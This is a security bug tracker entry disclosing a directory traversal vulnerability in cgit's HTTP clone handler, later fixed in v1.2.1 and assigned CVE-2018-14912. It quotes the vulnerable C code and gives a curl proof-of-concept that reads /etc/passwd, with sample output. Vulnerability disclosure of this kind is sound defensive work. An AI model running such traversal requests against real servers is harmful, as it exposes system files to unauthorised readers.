New issue
Advanced search Search tips

Issue 1627 link

Starred by 1 user

Issue metadata

Status: Fixed
Owner:
Closed: Aug 3
Cc:



Sign in to add a comment

cgit: directory traversal in cgit_clone_objects()

Project Member Reported by jannh@google.com, Aug 3

Issue description

There is a directory traversal vulnerability in cgit_clone_objects(), reachable when the configuration flag enable-http-clone is set to 1 (default):

void cgit_clone_objects(void)
{
    if (!ctx.qry.path) {
        cgit_print_error_page(400, "Bad request", "Bad request");
        return;
    }

    if (!strcmp(ctx.qry.path, "info/packs")) {
        print_pack_info();
        return;
    }

    send_file(git_path("objects/%s", ctx.qry.path));
}

send_file() is a function that simply sends the data stored at the given filesystem path out over the network.
git_path() partially rewrites the provided path and e.g. prepends the base path of the repository, but it does not sanitize the provided path to prevent directory traversal.

ctx.qry.path can come from querystring_cb(), which takes unescaped data from the querystring. To trigger this case:

$ curl http://127.0.0.1/cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
[...]

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.
 
Project Member

Comment 1 by jannh@google.com, Aug 3

Status: Fixed (was: New)
Fixed in cgit v1.2.1: https://git.zx2c4.com/cgit/commit/?id=53efaf30b50f095cad8c160488c74bba3e3b2680
Project Member

Comment 2 by jannh@google.com, Aug 3

Project Member

Comment 3 by jannh@google.com, Aug 3

Labels: -Restrict-View-Commit
I requested a CVE for this. It was assigned CVE-2018-14912.
Project Member

Comment 5 by jannh@google.com, Aug 5

Labels: CVE-2018-14912

Sign in to add a comment